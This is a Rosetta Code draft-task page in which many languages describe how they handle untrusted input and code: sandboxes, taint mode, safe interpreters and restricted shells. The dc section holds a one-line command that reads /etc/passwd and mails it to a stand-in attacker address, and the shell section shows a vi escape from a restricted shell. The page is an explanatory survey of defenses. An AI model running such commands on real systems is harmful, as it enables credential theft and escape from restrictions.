Untrusted environment

From Rosetta Code
Untrusted environment is a draft programming task. It is not yet considered ready to be promoted as a complete task, for reasons that should be found in its talk page.

Sometimes it is useful to run code with inputs from untrusted users, untrusted code, etc. Explain and demonstrate the features your language uses for dealing with untrusted input and untrusted code. Explain possible compromises, weaknesses and exploits that may be available through the language (for example forcing execution of something outside of the application) as a result of using untrusted data sources.

The intention is that the definition is to be interpreted broadly; different languages will solve this task in very different ways and with (generally) incomparable results.

6502 Assembly

Translation of: Z80 Assembly

There is no trusted mode on the 6502. The program counter executes whatever it sees, and there are no segfaults, page faults, or what have you. Arbitrary code execution can be a risk, but can also be used by the programmer to speed up certain tasks, allow for opcodes an assembler doesn't support, etc.

68000 Assembly

The original 68000 has a "Supervisor Mode" and a "User Mode." There is little difference between the two except that Supervisor Mode has a separate stack pointer and allows certain commands that modify the full 16-bit processor status register as opposed to just the low byte of the status register. However, there is very little in protection from arbitrary code execution, as there is no way to prevent executing code from RAM. Whatever the program counter sees is what it executes, regardless of whether it should.

8080 Assembly

Translation of: Z80 Assembly

There is no trusted mode on the 8080. The program counter executes whatever it sees, and there are no segfaults, page faults, or what have you. Arbitrary code execution can be a risk, but can also be used by the programmer to speed up certain tasks, allow for opcodes an assembler doesn't support, etc. Some machines even require arbitrary code execution to properly function, such as the Game Boy, which must jump to internal RAM in order to use direct memory access to quickly display hardware sprites.

C

C is a double-edged sword. It was designed to allow programmers to do virtually anything and everything. The aim was a high-level language that stays as close as possible to the computer hardware (CPU and memory), which is what makes C fast, and why large parts of operating systems can be written in it. The ability to access memory at the bit level, embed assembly directly, and yet remain readable (or unreadable) by humans resulted in a language which forms the foundation of the world as we know it.

In other words, there is no check. Users and programmers can do anything they want. There is no sandbox, no off-limits area. Unless it is explicitly forbidden by the compiler or the operating system, a C program without sufficient and necessary checks will result in 'unintended and unforeseen' consequences with the 'appropriate' inputs.

On the bright side, programming in C disciplines the programmer: nothing like a grueling boot camp or wartime conscription to make one appreciate the niceties of Java, Perl, Python or Haskell.

But try writing an operating system with them...

With great power, comes great responsibility. :)

dc

Beware of allowing user input to be fed to the reverse Polish calculator. dc can run shell commands via its ! command, and this could be a security risk:

!cat /etc/passwd|mail badguy@hackersrus.com
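One possible mitigation, sketched here as a POSIX shell wrapper (safe_dc is a hypothetical name, not a real tool), is to refuse any input containing dc's ! shell-escape command before it is ever evaluated:

```shell
# A sketch: vet untrusted input before it reaches dc. dc's '!' command
# executes the rest of the line as a shell command, so refuse any
# input that contains it.
safe_dc() {
    case $1 in
        (*'!'*) echo 'rejected: shell escape attempt'; return 1 ;;
    esac
    # only evaluate when dc is actually available
    command -v dc >/dev/null && printf '%s\n' "$1" | dc
}

safe_dc '2 3 + p'            # evaluated normally
safe_dc '!cat /etc/passwd'   # refused before dc ever sees it
```

A whitelist of permitted characters would be stricter still; this blocklist only addresses the shell-escape vector.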

FreeBASIC

FreeBASIC does not have built-in functions specifically designed to handle untrusted input or code. However, there are general practices that can be followed to mitigate the risks associated with untrusted input:

  1. Input Validation: Always validate user input before using it. This can help prevent issues like SQL injection, buffer overflow, etc.
  2. Prevent execution of untrusted code: FreeBASIC does not have a function to execute code dynamically (such as eval in JavaScript). But this is a good thing from a security point of view, as it reduces the risk of arbitrary code execution.
  3. Error Handling: Always include error handling in your code. This can prevent unexpected behavior and give you more control over what happens when an error occurs.
  4. Limiting system access: Be careful when using system-level commands (such as SHELL). These can potentially be exploited to execute arbitrary commands on the host system.
  5. Safe Libraries and Functions: Use libraries and functions that are known to be safe. Avoid using outdated or insecure features.

Go

Go is generally a safe language. In particular, whilst pointers are supported, arithmetic on them is not and so it's not possible to use pointers to poke around within the language's internal structures or to point to arbitrary memory locations.

However, there are occasions (usually for performance reasons or to do things which - whilst desirable - wouldn't otherwise be possible) when pointer arithmetic is needed and Go provides the 'unsafe' package for these occasions.

This package contains functions which allow one to determine the size/alignment of various entities and the offset of particular fields within a struct as well as to perform pointer arithmetic.

The following example shows how to use a combination of reflection and pointer arithmetic to indirectly (and unsafely) change the contents of a byte slice.

package main

import (
    "fmt"
    "reflect"
    "unsafe"
)

func main() {
    bs := []byte("Hello world!")
    fmt.Println(string(bs))
    g := "globe"
    hdr := (*reflect.SliceHeader)(unsafe.Pointer(&bs))
    for i := 0; i < 5; i++ {
        data := (*byte)(unsafe.Pointer(hdr.Data + uintptr(i) + 6))
        *data = g[i]
    }
    fmt.Println(string(bs))
}
Output:
Hello world!
Hello globe!
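By contrast with the unsafe package, ordinary Go code cannot index past the end of a slice: the runtime bounds check panics instead of touching arbitrary memory. A minimal sketch (safeByteAt is a made-up helper, not part of the task) turning that panic into a recoverable result:

```go
package main

import "fmt"

// safeByteAt returns the byte at index i, or ok=false if i is out of
// range. Plain bs[i] would panic at runtime rather than read outside
// the slice; recover converts that panic into an ordinary result.
func safeByteAt(bs []byte, i int) (b byte, ok bool) {
	defer func() {
		if recover() != nil {
			b, ok = 0, false
		}
	}()
	return bs[i], true
}

func main() {
	bs := []byte("Hello")
	if _, ok := safeByteAt(bs, 10); !ok {
		fmt.Println("out-of-range access rejected by the runtime")
	}
	if b, ok := safeByteAt(bs, 1); ok {
		fmt.Printf("in-range access fine: %c\n", b)
	}
}
```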

J

J has some security mechanisms built in, and they are detailed below. But to understand their scope (and limitations), it's probably helpful to provide some context first.

J is a function-level language, expressed with composition of primitive words, like + for plus and ! for factorial and @ for function-composition and / for reduce, etc.

Because J is also (mostly) functional, almost all of these primitive words are also "native": that is, they stay within the bounds of the execution environment, and cannot reach outside of it to the host system. They cannot even affect J's own memory space, except through assigning variables.

In fact, there is only one word which can reach outside the execution environment (the functional scope of the program): !:, the aptly named "foreign" operator. This one operator encapsulates all access to the outside world, and even the "behind the scenes world" of J's own memory space.

The operator takes two arguments and derives a function, which specifies which kind of foreign interface you want. For example, 1!:1 is the specific function to read a file, and 1!:2 is the function to write one (as in 1!:1 'filename' and some_data 1!:2 'filename', respectively). The foreign function 15!:0 allows the J programmer to call a shared library (dll, so, dylib, etc), 2!:5 reads environment variables (e.g. 2!:5'PATH'), and 2!:55 will terminate the program (quit, die: the mnemonic is that 255 is the "last" value of a byte, and 2!:55 is the "last" thing you want to do in a J program). There are many more, grouped into families (the first argument to !: specifies which family you want, e.g. 1!:n is the file family, and 1!:1 is specifically the file read function).

But the key thing is that this one operator, !:, controls all the dangerous stuff, so if we want to prevent dangerous stuff, we only have to put guards in one place. And, in fact, we have "foreign controls": foreign functions which themselves control which foreign functions are allowed. In other words, there's only one "door" to J, and we can lock it.

From the J documentation:

9!:25 y Security Level: The security level is either 0 or 1. It is initially 0, and may be set to 1 (and can not be reset to 0). When the security level is 1, executing Window driver commands and certain foreigns (!:) that can alter the external state cause a “security violation” error to be signalled. The following foreigns are prohibited: dyads 0!:n , 1!:n except 1!:40 , 1!:41, and 1!:42 , 2!:n , and 16!:n .

There are further foreign controls on how much space, or time, a single execution is allowed to take:

9!:33 y Execution Time Limit: The execution time limit is a single non-negative (possibly non-integral) number of seconds. The limit is reduced for every line of immediate execution that exceeds a minimum granularity, and execution is interrupted with a “time limit error” if a non-zero limit is set and goes to 0.
9!:21 y Memory Limit: An upper bound on the size of any one memory allocation. The memory limit is initially 2^30 on 32-bit systems and 2^62 on 64-bit systems.

With all that said, the language has seen limited use in contexts where code injection is a concern, so these mechanisms are rarely exercised (and somewhat dated).

Kotlin

Kotlin/JVM, which compiles to bytecode rather than to native code, has the same security features as other languages which target the Java Platform.

In particular the JVM verifies the bytecode to ensure that it cannot branch to invalid locations or address memory outside the bounds of an array. Pointer arithmetic is disallowed as are unchecked type casts.

The JVM also automatically allocates memory for new objects and deallocates memory for objects which are no longer needed using a garbage collector. Manual memory management is not supported.

It is possible to run untrusted bytecode within a 'sandbox' which prevents it from interfering with the underlying environment. However, programs can also be cryptographically signed by a recognized authority and users can then allow such programs to be run within a trusted environment.

Of course, no system is perfect: a number of vulnerabilities have been discovered in these mechanisms over the years, and more will doubtless be discovered in the future, given the ubiquity of the Java Platform and hence its attractiveness to hackers.

Lua

Lua supports protected calls and custom environments. Details have changed through various versions, and the specifics can become quite involved if/as needed, however the following might suffice as a simple example for Lua 5.2 or 5.3.

local untrusted = [[
  print("hello") -- safe
  for i = 1, 7 do print(i, i*i) end -- safe
  setmetatable(_G, malicious) -- unsafe
]]
sandbox = { print=print }
local ret, msg = pcall(load(untrusted,nil,nil,sandbox))
print("ret, msg:", ret, msg)
Output:
hello
1       1
2       4
3       9
4       16
5       25
6       36
7       49
ret, msg:        false   [string "  print("hello")..."]:3: attempt to call global 'setmetatable' (a nil value)

Nim

Nim can compile to native code (via C, C++ or Objective-C) or to JavaScript. When compiling to native code, like other languages such as Ada, it includes checks to ensure that code is safe.

So, in release mode, which is the mode to prefer, assignments, indexing, accesses via references and overflows are checked. For instance, in normal code there is no way to get a buffer overflow, as an out-of-bounds access raises an IndexDefect exception.

Nim ensures (unless explicitly specified otherwise) that memory is initialized with binary zeros, which avoids erratic behavior. That also means that all pointers and references are initialized to nil, which avoids undefined behavior when dereferencing a pointer that was not explicitly initialized.

Nim uses copy semantics, which means that assignments always copy the value and not the address. This avoids aliasing, which is unsafe, but may produce less efficient code. Fortunately, the compiler is smart enough to avoid most of the copies; nevertheless, the programmer should be aware of this.

The compiler does many checks to detect possible violations of memory safety. Everything is done to make sure that, unless explicitly requested, no memory corruption is possible.

However, as a systems language, Nim allows unsafe operations. These operations are unsafe:

– calling an external procedure (typically using C interface);

– converting from a type to another type using a cast (but normal conversions are safe);

– using pointers (allocating memory, dereferencing, freeing memory); references, by contrast, are safe, as they are managed by the GC;

– taking the address of an object (which means in fact to use pointers).

There is no simple way to do arithmetic operations on addresses. It is of course possible using casts between addresses/pointers and integers, but this is almost never necessary.

Nim allows deactivating and reactivating checks in some regions of code using pragmas. It also allows removing almost all checks with the compile-time option -d:danger. In this mode, the code is the most efficient, but at the price of safety.

PARI/GP

GP has a default, secure, which disallows the system and extern commands. Once activated this default cannot be removed without input from the user (i.e., not a script).

default(secure,1);
system("del file.txt");
default(secure,0); \\ Ineffective without user input

Perl

Perl can be invoked in taint mode with the command line option -T. While in this mode, input from the user, and all variables derived from it, cannot be used in certain contexts until 'sanitized' by being passed through a regular expression. The following program, for example, is killed by the interpreter, because the tainted $ARGV[0] is used as a filename for writing:

#!/usr/bin/perl -T
my $f = $ARGV[0];
open FILE, ">$f" or die 'Cannot open file for writing';
print FILE "Modifying an arbitrary file\n";
close FILE;

Phix

with safe_mode disables most potentially dangerous features, such as file i/o, invoking c_func/proc(), or using inline assembly outside of Phix\builtins\, which should make it safer to try out code from an untrusted source. It behaves identically to a -safe command line option; however, relying on the latter risks leaving a dangerous file lying around that might accidentally be run without the proper command line flag in some idle moment much later, whereas if you put it in the source, that is not such an issue.

-- demo\rosetta\safe_mode.exw
--
-- (distributed version has several more similar scraps,
--  this is just enough to give you the basic flavour.)
--
with javascript_semantics -- (erm, it kinda is anyway...)
with safe_mode

sequence cl = command_line()
?cl
if find_any({"-safe","--safe"},cl) then ?9/0 end if

-- disallow inline assembly (at compile time):
--#ilASM{ mov eax,1 }
-- The above would be rejected outright by pwa/p2js anyway, with or without safe_mode

Note that builtins\VM\pDiagN.e has to switch it off (eg to write an ex.err file when the program crashes), which is trivial to do but only via #ilASM{}, so a malicious programmer simply cannot do the same, that is, as long as you actually use safe_mode and don't ever put untrusted code into the builtins\ directory. Special allowances are made for mpfr.e (aka gmp) and pGUI.e (aka IUP), since they're not inherently dangerous; there may be some other libraries that deserve similar treatment.

As mentioned above, "with javascript_semantics" is itself a kind of safe mode anyway, that is if you run it in a browser, but it won't help in any way to stop the same file doing rude things should it be run on desktop/Phix.

Standard disclaimer applies:
Everything this relies on was added for this task in less than 24 hours.
In no way do I even begin to think this is secure or complete, but just yesterday (at the time of writing) it was 100% totally insecure: there was no "with safe_mode" option, no -safe command line option, nothing at all to check or even store that option in the compiler, or runtime. Should you want this to be improved, simply add more tests to demo\rosetta\safe_mode.exw, and obviously complain if/should they not entirely meet your expectations.

Racket

The racket/sandbox library provides a way to construct limited evaluators which are prohibited from using too much time, memory, read/write/execute files, using the network, etc.

#lang racket
(require racket/sandbox)
(define e (make-evaluator 'racket))
(e '(...unsafe code...))

The idea is that a default sandbox is suitable for running arbitrary code without any of the usual risks. The library can also be used with many different configurations, to lift some of the restrictions where that is a better fit.

Raku

(formerly Perl 6) Raku doesn't really provide a high security mode for untrusted environments. By default, Raku is sort of a walled garden. It is difficult to access memory directly, especially in locations not controlled by the Raku interpreter, so unauthorized memory access is unlikely to be a threat with default Raku commands and capabilities.

It is possible (and quite easy) to run Raku with a restricted setting which will disable many IO commands that can be used to access or modify things outside of the Raku interpreter. However, a determined bad actor could theoretically work around the restrictions, especially if the nativecall interface is available. The nativecall interface allows directly calling in to and executing code from C libraries so anything possible in C is now possible in Raku. This is great for all of the power it provides, but along with that comes the responsibility and inherent security risk.

Really, if you want to lock down a Raku instance so it is "safe" for unauthenticated, untrusted, general access, you are better off running it in some kind of locked down virtual machine or sandbox managed by the operating system rather than trying to build an ad hoc "safe" environment.

REXX

Details for Regina REXX.

REXX is designed to assist in system scripting. Normally any command that is not a REXX instruction or user added command is passed to the operating system or default ADDRESS for evaluation.

Regina includes a RESTRICTED mode. This disables

  • LINEOUT, CHAROUT, POPEN, RXFUNCADD BIFs
  • "OPEN WRITE", "OPEN BOTH" subcommands of STREAM BIF
  • The "built-in" environments eg. SYSTEM, CMD or PATH of ADDRESS command
  • Setting the value of a variable in the external environment with VALUE BIF.
  • Calling external functions

This mode is started from the command line with the -r option. When embedding Regina for use with application scripting, the RexxStart API can have the RXRESTRICTED bit set in the CallType field.

By the way, BIF is short for Built In Function.

For example, given cat.rexx:

ADDRESS SYSTEM 'cat cat.rexx'
Output:
prompt$ regina cat.rexx
ADDRESS SYSTEM 'cat cat.rexx'
prompt$ regina -r cat.rexx
     1 +++ ADDRESS SYSTEM 'cat cat.rexx'
Error 95 running "/home/user/lang/rexx/cat.rexx", line 1: [Restricted feature used in "safe" mode]
Error 95.5: [Running external commands invalid in "safe" mode]

Ruby

Older versions of Ruby handled untrusted input with the global variable $SAFE. Settings higher than 0 invoked an increasing level of sandboxing and general paranoia. ($SAFE level 4 was removed in Ruby 2.1, and the variable itself in Ruby 3.0, so the following no longer works on current interpreters.)

require 'cgi'
$SAFE = 4
cgi = CGI::new("html4")
eval(cgi["arbitrary_input"].to_s)
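Since $SAFE is unavailable on modern Ruby, the usual mitigation today is simply to never eval untrusted text. A hedged sketch of the parse-don't-eval alternative (parse_untrusted_integer is a hypothetical helper, not a standard API):

```ruby
# Sketch: instead of eval-ing untrusted input, accept only a narrow,
# explicitly parsed grammar. Here only plain base-10 integers pass.
def parse_untrusted_integer(input)
  Integer(input, 10)   # raises ArgumentError on anything non-numeric
rescue ArgumentError, TypeError
  nil
end

p parse_untrusted_integer("42")                   # accepted
p parse_untrusted_integer("system('rm -rf /')")   # rejected, returns nil
```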

Rust

While Rust does not have a sandboxed execution mode of its own, it has some of the best support available for compiling to WebAssembly, which is explicitly designed to be sandboxed and has multiple runtime environments in development.
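Within Rust itself, safe code already refuses untrusted memory access. A minimal sketch (just the standard Vec API, nothing WebAssembly-specific) showing an untrusted index being rejected rather than dereferenced:

```rust
fn main() {
    let data = vec![10, 20, 30];
    let untrusted_index: usize = 99;

    // Safe Rust offers no way to read past the end of the Vec:
    // get() returns None instead of performing an out-of-bounds read,
    // and data[untrusted_index] would panic rather than corrupt memory.
    match data.get(untrusted_index) {
        Some(v) => println!("value: {}", v),
        None => println!("index {} rejected", untrusted_index),
    }
}
```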

Scala

High-level programming languages aim to address problems in a user domain, rather than problems close to the machine as assembly languages do. That aim in itself shields the machine and spares the programmer irrelevant machine details: in contrast to an assembler, a high-level language offers no 'right on the bare silicon' programming and no raw memory model.

Another objective of a high-level language is to be platform-independent, and consequently machine-independent. Scala is supported on the following target platforms:

  • the JVM 'Write once, run anywhere' platform,
  • embedded and mostly sandboxed ECMAScript (JavaScript) engines (internet browser, Node.js),
  • on the Microsoft .Net platform (obsolete)
  • Scala Native for the LLVM infrastructure (generates machine-code)


Each of these target platforms, and subsequently the operating system, has its own specific vulnerabilities and countermeasures.

It's better to solve such problems where they arise.

Tcl

Tcl allows evaluation of untrusted code through safe interpreters, which are evaluation contexts where all unsafe operations are removed. This includes access to the filesystem, access to environment variables, the opening of sockets, description of the platform, etc.

set context [interp create -safe]
$context eval $untrustedCode

Because the only way that Tcl code can perform an operation is by invoking a command, if that command is not present in the execution context then the functionality is gone.

It is possible to add back restricted versions of operations, to allow things like access to built-in packages.

set context [safe::interpCreate]
$context eval $untrustedCode

These work by installing aliases from the otherwise-removed commands in the safe interpreter to implementations of the commands in the parent master interpreter that take care to restrict what can be accessed. Note that the majority of unsafe operations are still not present, and the paths supported to the packages are virtualized; no hole is opened up for performing unsafe operations unless a package author is deliberately careless in their C implementation.

UNIX Shell

Enclose variable references in double quotes

Variable references should be enclosed in double quotes to prevent an empty value from being omitted during evaluation, which would cause an error:

# num=`expr $num + 1` # This may error if num is an empty string
num=`expr "$num" + 1` # The quotes are an improvement
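In the same spirit, untrusted values can be validated against a whitelist pattern before ever being substituted into a command. A sketch using a hypothetical is_number helper:

```shell
# Accept only non-empty strings of digits; everything else is refused
# before it can reach expr, eval, or a command line.
is_number() {
    case $1 in
        ('' | *[!0-9]*) return 1 ;;
        (*) return 0 ;;
    esac
}

num='42'
if is_number "$num"; then
    num=`expr "$num" + 1`
fi
echo "$num"
```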

Do not allow users to run programs that can launch a new shell

Traditional Unix provides a restricted mode shell (rsh) that does not allow the following operations:

  • changing directory
  • specifying absolute pathnames or names containing a slash
  • setting the PATH or SHELL variable
  • redirection of output

However, the restricted shell is not completely secure. A user can break out of the restricted environment by running a program that features a shell function. The following is an example of the shell function in vi being used to escape from the restricted shell:

vi
:set shell=/bin/sh
:shell

Use a chroot jail

Sometimes chroot jails are used to add a layer of security to the execution of untrusted programs, by restricting filesystem access to a dedicated directory tree:

mkdir ~/jail
cd ~/jail
chroot ~/jail
setuid(9)       # pseudocode: a real program would call the setuid
                # system call, here with 9 as the userid of a non-root user
rm /etc/hosts   # actually points to ~/jail/etc/hosts

Wren

Wren code is effectively sandboxed by its VM; it is limited in what it can do and is therefore pretty safe in itself.

However, it has no way of telling whether any input is from an untrusted source except that, when it is being embedded, input can only arrive via the host application which is therefore responsible for checking its authenticity.

A possible vulnerability is that Wren modules are always imported in source code rather than binary form and there is no 'signing' mechanism. It would therefore be possible for someone to replace a 'bona fide' module with a malicious one without either Wren's VM or the host application realizing this had been done.

Z80 Assembly

There is no trusted mode on the Z80. The program counter executes whatever it sees, and there are no segfaults, page faults, or what have you. Arbitrary code execution can be a risk, but can also be used by the programmer to speed up certain tasks, allow for opcodes an assembler doesn't support, etc. Some machines even require arbitrary code execution to properly function, such as the Game Boy, which must jump to internal RAM in order to use direct memory access to quickly display hardware sprites.

zkl

Basically, there is no trusted mode. If the OS lets you do it, you can. This means internet access, file system examination/modification, forking processes, pulling in arbitrary source code, compiling and running it, etc.